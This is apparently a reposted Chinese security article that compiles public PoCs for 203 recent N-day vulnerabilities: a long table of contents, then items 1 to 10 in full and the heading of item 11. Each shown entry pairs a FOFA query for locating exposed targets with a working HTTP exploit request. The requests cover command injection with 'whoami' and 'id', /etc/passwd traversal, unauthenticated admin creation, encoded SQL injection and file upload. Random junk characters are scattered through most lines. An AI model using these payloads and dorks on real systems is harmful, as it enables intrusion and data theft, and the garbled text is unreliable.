互联网公开漏洞整理202309-202406
- Q, s7 P7 ]' X" i道一安全 2024-06-05 07:41 北京4 n" \/ Q& M1 Q/ o3 A0 P
以下文章来源于网络安全新视界 ,作者网络安全新视界
! |) G! P8 k: k1 z4 q+ s3 v( F1 G7 s! O( B8 G! C6 k0 h
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
' |5 q& F& n K& q
$ q2 p h$ J5 h+ x漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。 v1 Z+ I% B) Q K i, e5 o
: G, A* J$ T' ?1 I# e
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。9 f- A b& f9 Q/ ^1 n( O5 b
; b7 l% t/ d6 e: K) q. n' M
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。' h( D3 p, f/ K3 H/ \( p
! @3 u+ P2 D1 w1 Z3 _
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。* D+ M. t) f& ]( h Y+ `8 H+ S: u
+ I$ H1 T3 ^0 A- F9 Q) R! U5 N4 i& V* Q
声明: G3 |( O/ U! v. {' Q1 K
. ]8 ~# g6 h. h" f _6 T# n
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。/ g: T* j- e. a2 I7 u4 p9 e
# g" H$ c) Q9 t0 {" B6 c有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
5 f* W5 u5 N( Z* ^% g. R4 x Y9 n _) E9 T/ C
" ?* [$ k0 T; U* z6 i- K7 n. l0 J( ?9 n6 ^( `6 p$ e, b8 p
目录
* H% [; @+ o2 [, _3 A
/ {8 h' I' @) I+ K) P* o012 X/ g$ ` c: u/ T/ z8 _8 B
( ~* B3 k) D( A. P3 c! u; T1. StarRocks MPP数据库未授权访问
% I! u/ P/ X b1 W3 d2. Casdoor系统static任意文件读取( z! I6 @: x' V+ d. ], m1 D- }
3. EasyCVR智能边缘网关 userlist 信息泄漏
4 _% m1 Q4 L5 c7 W* q3 F( _4. EasyCVR视频管理平台存在任意用户添加
5 ?4 P% z0 E6 J+ G5. NUUO NVR 视频存储管理设备远程命令执行
# y( u7 K$ G: V7 _3 W2 S6. 深信服 NGAF 任意文件读取% [- V; C" i5 m* P5 G5 A+ h% z
7. 鸿运主动安全监控云平台任意文件下载
3 n/ }/ k; V$ b8 c( g8. 斐讯 Phicomm 路由器RCE
' ?- I: e7 L, ?" Q& V4 c9. 稻壳CMS keyword 未授权SQL注入
. r" z Q3 \& \+ o10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
! n3 B& u1 C2 ~; z; Y8 {' k" A11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 F( f8 d7 s# A" T5 }6 w& C
12. Jorani < 1.0.2 远程命令执行# J: z1 d6 u0 g$ N! z5 X
13. 红帆iOffice ioFileDown任意文件读取. R8 M; ^4 x. K
14. 华夏ERP(jshERP)敏感信息泄露+ o, A N7 X* ]6 e- [# u1 v5 A
15. 华夏ERP getAllList信息泄露
) }- e6 \( j, ]4 E! V16. 红帆HFOffice医微云SQL注入
( D: [3 o l8 G) A" X% N17. 大华 DSS itcBulletin SQL 注入% Z9 k# g5 y: v4 J$ ^
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露# P) |' u# X- D
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入# A. B1 ~% I: h' L& m: G8 M o
20. 大华ICC智能物联综合管理平台任意文件读取
# P5 Z4 L4 a+ n! ^' X, r, L$ i21. 大华ICC智能物联综合管理平台random远程代码执行: \ y6 ~9 K& B) L! {
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
9 V& h$ m. t1 ]1 M23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% ^+ N7 ? O) x
24. 用友NC 6.5 accept.jsp任意文件上传
" u. B5 L0 h# `" B25. 用友NC registerServlet JNDI 远程代码执行
& ` p, f# v3 |6 k( w1 `26. 用友NC linkVoucher SQL注入
0 N4 Z% s5 ?. A% E) ]27. 用友 NC showcontent SQL注入; ?/ a0 f7 S" }, F- x+ c! `6 a
28. 用友NC grouptemplet 任意文件上传+ _% I6 ~$ H5 N( a) h% B
29. 用友NC down/bill SQL注入
+ N. e# G+ O4 X5 }8 b' l( w+ a; ~30. 用友NC importPml SQL注入8 b& u2 D! O( _* _ x) d" I
31. 用友NC runStateServlet SQL注入! t2 L8 V! g" a" |
32. 用友NC complainbilldetail SQL注入& i4 f5 p/ M# b/ D4 ?& C
33. 用友NC downTax/download SQL注入, t; h p6 J+ N! Q" c# O. u' b0 P
34. 用友NC warningDetailInfo接口SQL注入+ X1 {7 C7 g' ] _1 j! ?
35. 用友NC-Cloud importhttpscer任意文件上传
) w6 ]7 b' S) Z) T36. 用友NC-Cloud soapFormat XXE5 o S0 j0 E% G* N
37. 用友NC-Cloud IUpdateService XXE0 m; m6 s7 |" f* k" A( f! y
38. 用友U8 Cloud smartweb2.RPC.d XXE
; G: l) X `- Y0 I! y" V39. 用友U8 Cloud RegisterServlet SQL注入
8 Q. q: ^5 {8 X& H; k! A# K8 z4 \/ g40. 用友U8-Cloud XChangeServlet XXE/ `7 y- T8 s) F1 B" a7 n
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入$ T3 r5 E$ \- {4 m' N
42. 用友GRP-U8 SmartUpload01 文件上传
/ j4 {& w) c' F) f1 d1 O43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 G! P9 j- v( _7 i44. 用友GRP-U8 bx_dj_check.jsp SQL注入
! ~! [7 E! o" w# J) E0 x' B$ t45. 用友GRP-U8 ufgovbank XXE
# A5 _, o) c2 n* u, S3 u3 z: O46. 用友GRP-U8 sqcxIndex.jsp SQL注入6 v2 H/ e6 K4 K$ m
47. 用友GRP A++Cloud 政府财务云 任意文件读取4 M# L( ]1 D( j
48. 用友U8 CRM swfupload 任意文件上传* A! Q6 {# M: J5 ~+ i( q
49. 用友U8 CRM系统uploadfile.php接口任意文件上传6 B. R6 _" s9 q% b4 }" v/ t) N- v' Y6 Q
50. QDocs Smart School 6.4.1 filterRecords SQL注入
: h1 d m3 R5 m5 ^* z% F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入# N4 D: S! F/ x
52. 泛微E-Office json_common.php sql注入) ~8 p8 ^! g8 P$ H$ o! _7 A7 E0 b
53. 迪普 DPTech VPN Service 任意文件上传1 I* R0 B# Q+ V4 J2 Q% N4 i# n
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
# L* W9 f8 c2 r" w% s55. 畅捷通T+ getdecallusers信息泄露% k2 T, r, b Q8 z7 F8 n
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, C; R# H+ x* p; E( k+ V
57. 畅捷通T+ keyEdit.aspx SQL注入
+ \. m6 i. f0 n1 b2 v+ [58. 畅捷通T+ KeyInfoList.aspx sql注入
% O6 _. G( c5 B6 e59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
5 K$ l& _9 V6 p# c+ g% g60. 百卓Smart管理平台 importexport.php SQL注入
$ ?6 P( U6 n; V61. 浙大恩特客户资源管理系统 fileupload 任意文件上传. n: \# u7 J, K8 A
62. IP-guard WebServer 远程命令执行4 w$ m. T2 k3 |8 w. K
63. IP-guard WebServer任意文件读取
@9 N. J* m, X: T64. 捷诚管理信息系统CWSFinanceCommon SQL注入, G- l6 T5 z" ]' C5 t" G$ m" R
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
1 K9 z# x4 v/ K' Z' H66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入7 z- r% d- L! ~* R
67. 万户ezOFFICE wpsservlet任意文件上传3 P" r* d) p2 m) @6 p
68. 万户ezOFFICE wf_printnum.jsp SQL注入* i7 U+ |& ^7 R Z7 J
69. 万户 ezOFFICE contract_gd.jsp SQL注入1 w( y# C" |! z; h
70. 万户ezEIP success 命令执行
9 O0 W; y. y2 S71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入1 z. K& a4 `7 J2 D1 I
72. 致远OA getAjaxDataServlet XXE
/ f. g3 u( H: y- P g73. GeoServer wms远程代码执行
- P$ N4 N" t) Z$ j6 J74. 致远M3-server 6_1sp1 反序列化RCE' i3 j2 ?$ o. N" Y" M7 Y+ ~
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! i6 @9 U4 C' m76. 新开普掌上校园服务管理平台service.action远程命令执行+ k* ^- c* }0 d. U% E1 z
77. F22服装管理软件系统UploadHandler.ashx任意文件上传& ?3 D0 m3 O) }1 l1 s
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传1 R5 u- Q' }1 G
79. BYTEVALUE 百为流控路由器远程命令执行- X3 k# z- D3 T! _ C9 V
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传( v& O% l- B, U* ~% G; e/ C8 E, i( n) x
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
& w, v0 B7 H, k Z( @3 z3 R# X0 ?82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
' [1 a. f' s$ V% S: I4 R83. JeecgBoot testConnection 远程命令执行1 B! f- r5 H7 J
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入7 F( x& ^* u/ [5 W$ `
85. SysAid On-premise< 23.3.36远程代码执行" y- T6 E' w5 {( {
86. 日本tosei自助洗衣机RCE$ {1 J) S( t: F
87. 安恒明御安全网关aaa_local_web_preview文件上传
( U& p1 r' w2 ?$ X+ a/ D9 R88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 E# ~; R. @6 ~1 Q D( z$ k+ D; ?0 R
89. 致远互联FE协作办公平台editflow_manager存在sql注入
, B! l8 h* m) v. o9 k, O' {90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
+ U+ A/ x# A% ]3 C! ^91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
9 H: ?2 Q* Q+ ?; p! @# c92. 海康威视运行管理中心session命令执行2 J' v) U! a, w- x: U6 | z( D
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传 }) k+ |1 ^0 c& ?9 F
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传/ y8 P+ G8 ~* s$ o1 F9 q% g
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行; L1 @/ J1 B1 r- k, \! u& K2 r
96. Apache OFBiz 18.12.11 groovy 远程代码执行( g: c* D& N( t l
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
; l2 z, h8 U; |* n. q8 V98. SpiderFlow爬虫平台远程命令执行' N8 J" k# Q4 d7 t3 ?4 p
99. Ncast盈可视高清智能录播系统busiFacade RCE0 j! u: A+ @4 p3 G1 a
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& m6 Y5 u q$ w& R/ B& e; T" B
101. ivanti policy secure-22.6命令注入
R3 u, J0 \! I4 M/ `' v2 h3 I# [102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
9 Q" B9 m0 `6 h3 E( N2 s- z103. Ivanti Pulse Connect Secure VPN XXE
$ { h; M% Q" i3 i" Y104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露, d% v, s$ X+ h! {* v6 T
105. SpringBlade v3.2.0 export-user SQL 注入
' R0 z1 b* u$ ^0 ]" q" l3 S5 Y106. SpringBlade dict-biz/list SQL 注入
% f2 T' i, [ B }107. SpringBlade tenant/list SQL 注入% ?8 `, K; g; D2 ^- [+ I6 I( U5 g
108. D-Tale 3.9.0 SSRF1 U( f1 _- }: W2 T+ Z6 X M
109. Jenkins CLI 任意文件读取+ I; |* S: ~- o: `9 j
110. Goanywhere MFT 未授权创建管理员
# E% a( v- F, l111. WordPress Plugin HTML5 Video Player SQL注入7 u4 c W" e2 }% k9 X) I
112. WordPress Plugin NotificationX SQL 注入
0 d8 B2 t" z- F1 C2 d; j" R113. WordPress Automatic 插件任意文件下载和SSRF/ I- H! W, K3 D# }$ W I
114. WordPress MasterStudy LMS插件 SQL注入
2 x! G1 I# C, x8 Y3 u115. WordPress Bricks Builder <= 1.9.6 RCE( g/ o8 _1 C$ @) {9 t
116. wordpress js-support-ticket文件上传
}3 d0 Z6 z2 k6 J117. WordPress LayerSlider插件SQL注入. _2 K7 `; T7 O! ~) k% B
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 H) Y; v& p& S5 k N! E
119. 北京百绰智能S20后台sysmanageajax.php sql注入
. m u* V: S$ q% \. F7 H120. 北京百绰智能S40管理平台导入web.php任意文件上传$ L7 R8 ?( T6 {9 x2 t
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
2 S; W( l. ~& ~+ p, _122. 北京百绰智能s200管理平台/importexport.php sql注入
0 w! e v r% @" |, c123. Atlassian Confluence 模板注入代码执行2 D# k9 ^& |( @. u7 h$ I/ r
124. 湖南建研工程质量检测系统任意文件上传/ F" \9 Q7 z2 u; S7 ~; S. `" V: x9 b# B. @
125. ConnectWise ScreenConnect身份验证绕过
1 L) Q0 X4 V- c( v5 I+ U126. Aiohttp 路径遍历1 s4 ^. h9 m1 _8 L9 _+ r! e
127. 广联达Linkworks DataExchange.ashx XXE7 |' }& f' h3 _( K6 W' x4 W. ?) Q
128. Adobe ColdFusion 反序列化
( M, d4 X) g2 v: G( U, ^) F129. Adobe ColdFusion 任意文件读取
9 y- V) ~, D- ^, q130. Laykefu客服系统任意文件上传) c) a& O8 p' p" a7 u7 f7 A1 b
131. Mini-Tmall <=20231017 SQL注入5 E F2 L3 H& R, ^* y
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过# ^" c6 `7 L# f& {! E1 E
133. H5 云商城 file.php 文件上传6 T' c- p6 }# g+ j% c0 a
134. 网康NS-ASG应用安全网关index.php sql注入# L9 z- E+ R) L% h
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
' m4 [3 U0 W6 q/ v/ i% y136. NextChat cors SSRF
1 D r) f! N. E- V8 S, L137. 福建科立迅通信指挥调度平台down_file.php sql注入
/ @. b# G* e1 u. D( N138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
% p: A+ P: r: q4 A139. 福建科立讯通信指挥调度平台editemedia.php sql注入7 [& n& p5 l1 k/ E$ J
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
. h; [# N, f5 ]9 C* x141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入9 N: D0 G" Q6 C; d+ l% ? A2 h* R% w
142. CMSV6车辆监控平台系统中存在弱密码! @3 n# e1 L5 B' Q; l3 N6 P
143. Netis WF2780 v2.1.40144 远程命令执行; p5 |# N+ q7 z* O6 a
144. D-Link nas_sharing.cgi 命令注入2 e! ~; p( m2 B* G1 m- u2 D/ B8 h
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
/ }, u1 ~5 x' j; n1 i z146. MajorDoMo thumb.php 未授权远程代码执行
5 D3 } \; d. R8 S! J z; ?3 G147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
0 \% a8 v' _% i* @( E148. CrushFTP 认证绕过模板注入. i/ K- D4 k) t/ c* r0 R* g- t1 t( c' V
149. AJ-Report开源数据大屏存在远程命令执行
+ m; v+ S5 O% N% V7 H( ~% D3 p150. AJ-Report 1.4.0 认证绕过与远程代码执行, L* b+ e' n6 s5 v1 g8 s
151. AJ-Report 1.4.1 pageList sql注入% c) R+ X# [# Q4 ?/ h
152. Progress Kemp LoadMaster 远程命令执行% K# K' a$ ] r
153. gradio任意文件读取$ a& U0 s# C! C6 e8 W: e
154. 天维尔消防救援作战调度平台 SQL注入
: E% _# z5 F" l155. 六零导航页 file.php 任意文件上传
b% _. F6 E3 Z" q- A1 P. J, f8 [) p156. TBK DVR-4104/DVR-4216 操作系统命令注入: [( N$ y* t9 c! ?
157. 美特CRM upload.jsp 任意文件上传
8 X" F5 P+ J. N6 J1 I158. Mura-CMS-processAsyncObject存在SQL注入
. V* C! K2 _) r2 {159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传" ]4 B9 @$ h, C* T7 w& v: B0 l7 C
160. Sonatype Nexus Repository 3目录遍历与文件读取9 k: F: c* h) v/ @5 g5 L t
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传* m8 @9 [9 A! X1 o' D9 k* L
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传! T/ f1 i; \8 X0 C
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传3 n. {. C% H+ H: _6 u
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传4 d5 y6 \' ?# |: Q
165. OrangeHRM 3.3.3 SQL 注入% [) x( _2 I) f3 a
166. 中成科信票务管理平台SeatMapHandler SQL注入
[3 F, `0 p! [7 f$ ^* q167. 精益价值管理系统 DownLoad.aspx任意文件读取: u% h' `7 i4 d* B) ~: B
168. 宏景EHR OutputCode 任意文件读取 U- V4 ]& L' z
169. 宏景EHR downlawbase SQL注入
; q# o4 h* M9 i# d- o* p170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) `$ M( b j9 e9 y: P: b171. 通天星CMSV6车载定位监控平台 SQL注入% L3 I& Y: z6 M8 i+ e, @* h. E8 }
172. DT-高清车牌识别摄像机任意文件读取
! C2 Z" x, J: U: J; ?/ O173. Check Point 安全网关任意文件读取
* p+ s: n- L0 B1 Z, l9 w) S! s7 {9 f174. 金和OA C6 FileDownLoad.aspx 任意文件读取
# P3 b1 C6 x# |/ @* D8 q175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入' X1 }1 y* p2 Z$ j& A
176. 电信网关配置管理系统 rewrite.php 文件上传
- p8 x8 r' u3 ^9 N9 L2 |: q) F177. H3C路由器敏感信息泄露
1 D1 M" k! A5 I3 z, B178. H3C校园网自助服务系统-flexfileupload-任意文件上传' D" \7 d7 \! r* ]+ U& ^9 f% q
179. 建文工程管理系统存在任意文件读取+ t% j+ a5 y7 X, ?
180. 帮管客 CRM jiliyu SQL注入" n- W& v6 G4 N. X3 M' t/ U
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入! Y6 S, [1 h9 y/ I6 ^. R9 f. K
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 F8 A- _3 I, V3 J1 S `183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
_# V7 N9 u7 |% B& q184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! q2 N. Q- m6 H, ^& D4 N185. 瑞友天翼应用虚拟化系统SQL注入' V+ ~, [. a" a
186. F-logic DataCube3 SQL注入3 j4 j3 G9 {1 O2 y
187. Mura CMS processAsyncObject SQL注入
" C# Z( f/ t0 S2 \+ I+ m188. 叁体-佳会视频会议 attachment 任意文件读取7 n8 D% Q% E1 ~3 w8 o4 R1 Z8 `
189. 蓝网科技临床浏览系统 deleteStudy SQL注入& i; @5 s( j1 m' e: n
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
2 F' f0 k8 ^3 ~1 h" @# [! f191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
5 R2 p. p0 E+ n: H0 `: m0 l/ ?192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 Q% b0 w# _: q
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
' r1 R( O9 ^3 u3 [4 z3 K+ `1 D$ F @194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 Z2 x3 q+ k0 ~195. 飞鱼星上网行为管理系统 send_order.cgi命令执行% K$ W0 ? L+ v2 N
196. 河南省风速科技统一认证平台密码重置
, J2 _; l8 p% s8 W1 |: P( o197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
& q" X" S; f8 ?1 C. {198. 阿里云盘 WebDAV 命令注入4 j( R; }8 H( Y* P+ r* I8 V
199. cockpit系统assetsmanager_upload接口 文件上传 `& Y4 e/ U q5 B$ _$ A5 P
200. SeaCMS海洋影视管理系统dmku SQL注入
0 g0 L! d( T" V! T! @' J201. 方正全媒体新闻采编系统 binary SQL注入
; }6 g! a# U: z- C202. 微擎系统 AccountEdit任意文件上传3 b- U. X6 B k# N! r
203. 红海云EHR PtFjk 文件上传7 a$ T$ a( S$ z% w; S+ L
O$ D8 W4 ]$ t5 t+ d/ O) t8 b, T
POC列表
0 G+ X+ J6 f( Z, f) g
/ U+ N+ m4 Q# M" h023 B; F: [ C/ B% M
3 j2 ^+ m1 F; o* R9 T1 j# R1. StarRocks MPP数据库未授权访问
# T- t+ @4 P3 X! d4 S1 vFOFA :title="StarRocks"
, v$ Y8 {8 h% MGET /mem_tracker HTTP/1.1
8 R) p6 K0 y, u6 F+ g( QHost: URL
$ ~6 O" [/ ^ U8 W7 x4 S
, o: k( r( [4 z( ], _
0 }4 s- v: U" }: `4 K: t! k: R2. Casdoor系统static任意文件读取; @6 S# J! x" j+ O
FOFA :title="Casdoor"1 A+ v4 C3 F' Y8 j# L- V
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 S: G9 ^6 u' Y9 P. U: HHost: xx.xx.xx.xx:9999) w' {6 L" z- D+ @, O0 d" T3 p7 F2 Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 @- ]3 l. v. |! W1 s# l
Connection: close
4 F+ g0 b3 m2 k2 c* kAccept: */*; S- y, w/ ?4 q! m6 U" [' i3 b4 D+ i
Accept-Language: en) Y& ?3 M9 x) n9 B6 L" G
Accept-Encoding: gzip+ a, W9 \4 l4 I
4 @* s- u: ^ m }
& E$ V9 K$ h2 t
3. EasyCVR智能边缘网关 userlist 信息泄漏
: h7 m1 R) f! }5 LFOFA :title="EasyCVR"
: n" I* d8 p5 [GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.12 E9 F% {; p- L7 l
Host: xx.xx.xx.xx3 g4 w1 ]1 M- x4 |2 g: v( ^: c
# U$ L7 d; }/ g6 r$ t# q2 M
: ^, L# }. M+ z' F4. EasyCVR视频管理平台存在任意用户添加
. C9 @$ z v3 N& C0 b9 sFOFA :title="EasyCVR"
' F- k- ?$ m3 ~9 N9 e
3 y' H4 t' q; K# Y- Q& i4 d9 J& ?password更改为自己的密码md50 n0 P7 Z' ?; O$ X! _$ c
POST /api/v1/adduser HTTP/1.12 [# P) E& y Q& z$ @/ q
Host: your-ip# j& Z$ }8 Z3 e4 D( I& U- J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8& L, E7 h, ~* Q3 P$ o1 p
4 A3 l; E( @. u- d, Bname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
. s( |0 b( H _) b8 f6 W' V ~9 J. | A4 F
% n! G: L2 _, j- u5. NUUO NVR 视频存储管理设备远程命令执行
9 T' z% k% p" I% vFOFA:title="Network Video Recorder Login"# Y3 C0 q7 _+ y* t. ]
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1% b5 M% R9 i- ]* G* r! C& v0 t
Host: xx.xx.xx.xx$ C5 x! ` z+ u% w- B& [2 G4 @. h* N
! q1 j& p. b! M3 M' K% Y
6 Q- Z3 p; Q$ P2 @" z& Q
6. 深信服 NGAF 任意文件读取
7 ]' K D! J7 x: nFOFA:title="SANGFOR | NGAF"
% B2 ]1 b% K3 y) A. {/ u% R6 Y8 `GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1( V/ f" ^1 o" k, ~- e8 q
Host:
( l. `: V* W _. H$ i# v( g! ~; e3 B1 \$ e) K, l* ?8 P- r `- J, C0 D
8 q* U- ?5 P) h
7. 鸿运主动安全监控云平台任意文件下载4 j6 N( r Z' E* I* A% b: r; V
FOFA:body="./open/webApi.html"7 n, Z* m- q, l: s/ z: o
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.18 B2 |# @9 k, P3 X t- D
Host:1 B' `( C( Z0 Q3 e: a- D
: U* d U3 i: h& ?% P; ?* A
+ h( `. V M0 D/ k
8. 斐讯 Phicomm 路由器RCE
& ~, J0 c/ P# K: g" ^6 rFOFA:icon_hash="-1344736688"
: b5 A3 p' d2 U默认账号admin登录后台后,执行操作
( y/ U6 R9 x1 w! wPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
9 m4 J( Y. X! l7 ? G+ S- {1 fHost: x.x.x.x
9 E% `3 {1 N1 j; dCookie: sysauth=第一步登录获取的cookie
. E7 A4 S: D" a9 O9 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
# N6 a: D' N8 H0 E0 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 P `, T) i6 k4 {# b9 w- R6 R, ?6 Q$ a: p M8 z2 D! L
------WebKitFormBoundaryxbgjoytz
4 T5 ~* {9 F8 |Content-Disposition: form-data; name="wifiRebootEnablestatus"
9 W* S% r; ?% S" ~) _* T- x' X
. e* L Q4 V8 F, } D1 U%s& }2 }* m" d' x( y$ X
------WebKitFormBoundaryxbgjoytz& U6 n1 p$ }0 D6 z9 _* ]# {8 [) C+ b
Content-Disposition: form-data; name="wifiRebootrange"5 W; c2 |5 Z0 D6 [
. u! f1 s) w" \1 V
12:00; id;" f( z" ^0 V4 v( n
------WebKitFormBoundaryxbgjoytz$ s4 Z( A) }+ f6 [7 f& e4 e
Content-Disposition: form-data; name="wifiRebootendrange"; s# C# `5 H1 h# P) h# \6 |
) A3 d0 C" w, g4 T%s:
$ K1 E, X: o- g; W9 O, u------WebKitFormBoundaryxbgjoytz9 o- p% @/ P( ^5 l G& d$ Q/ q& e
Content-Disposition: form-data; name="cururl2"
- y! L( @ t3 s
4 r+ a: \' E, } M9 k/ z
5 z0 }: J) j, \- e------WebKitFormBoundaryxbgjoytz--; T5 {, P/ S1 [4 [
8 N6 z' m) I1 R" a5 Q* [6 q
2 H3 M5 @( J1 V, c& m9. 稻壳CMS keyword 未授权SQL注入0 p& `3 S$ H' v/ r1 D( i) p
FOFA:app="Doccms"4 `! k1 c3 N) ~. }8 _3 X: ]
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.18 @7 g1 k. U9 Y9 ?* J+ _! f
Host: x.x.x.x! r2 ^- t+ E( H1 D; l
$ t U' _# x, N4 }5 l; e( s9 G* P9 O; c0 l0 S: e5 f
payload为下列语句的二次Url编码) @2 d& j' f5 k j
, l: X0 P) _3 R, Z0 _' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. ]2 w, D* w; B" J1 Z2 Q# |7 h$ s- v" m2 W" S$ g4 O. X }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; g) e4 ~4 p& L/ {9 p8 M/ e
FOFA:icon_hash="953405444". u1 N' X( k: H
9 f2 j, W% Y* @+ S- e- k- W' X7 b文件上传后响应中包含上传文件的路径# r. v. b7 A' ~9 c1 C) u& |' u
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ u5 R2 A$ a; |8 F/ FHost: x.x.x.x:xx
; o. I# X5 r! Q IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% H% w; c4 V# O3 x. TContent-Length: 197
4 E8 H% S5 }0 p' Y. V+ `# cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.98 Y% p* v& m7 X0 f) R
Accept-Encoding: gzip, deflate
$ ^& u! e/ `) ~Accept-Language: zh-CN,zh;q=0.9
. H% {* ^4 \/ s2 KConnection: close
: _) \1 `8 C& M0 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu; o# m0 }' k1 W
0 b1 Q# h2 c# K7 S9 R------WebKitFormBoundaryxdgaqmqu2 \9 |* w s7 c/ L: i
Content-Disposition: form-data; name="file"filename="icfitnya.txt"* U$ Q; K4 P) j6 S1 q+ ~
Content-Type: text/html
$ k: S/ q: E% l
8 x# V7 }9 ?! Z( Ojmnqjfdsupxgfidopeixbgsxbf' |- G. A7 m9 K$ }3 t; @8 O
------WebKitFormBoundaryxdgaqmqu--
_0 x$ d, b0 O% A( i* C; d$ C f0 S
# J5 b8 L! N& q4 t" j7 i! f
. ]! z9 t' H4 i+ V: l+ Y# e11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 z1 F* G+ v) nFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
